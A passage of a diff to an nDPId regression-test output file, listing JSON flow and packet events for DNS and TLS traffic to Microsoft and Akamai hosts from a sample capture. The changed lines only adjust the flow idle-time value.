+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1626168077507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1626168077507,"pkt":"8BiYFWV8WNVuaKQACABFAACx7P0AAHkRgg0ICAgIwKgBeQA1\/9QAnZiFVk2BgAABAAAAAQAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAcAlAAYAAQAAADsAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMBAAAAnEQAAA4QAAAEsAAk6gAAAADw="} 00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/efAAAEARLo3AqAF5CAgICMikADUAK6rjycUBAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAABBAAE="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -73,27 +73,27 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJH8AAEARg\/XAqAF5CAgICNUhADUANLCIQG8BAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAE="} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1626168077619,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077619,"pkt":"8BiYFWV8WNVuaKQACABFAACITIkAAHkRIqsICAgIwKgBeQA12RoAdB3yXZOBgAABAAAAAQAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAHAEwAGAAEAAAKpADQGbjBkc2NiwBgKaG9zdG1hc3RlcgZha2FtYWkDY29tAGDtWc8AAAPoAAAD6AAAA+gAAAcI"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1626168077622,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1626168077622,"pkt":"8BiYFWV8WNVuaKQACABFAADmBoMAAHgRaVMICAgIwKgBeQA14zEA0sNDCy+BgAABAAQAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAosACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAyUANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAMDABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKEAAQABAAAAEwAEAhYh6w=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} 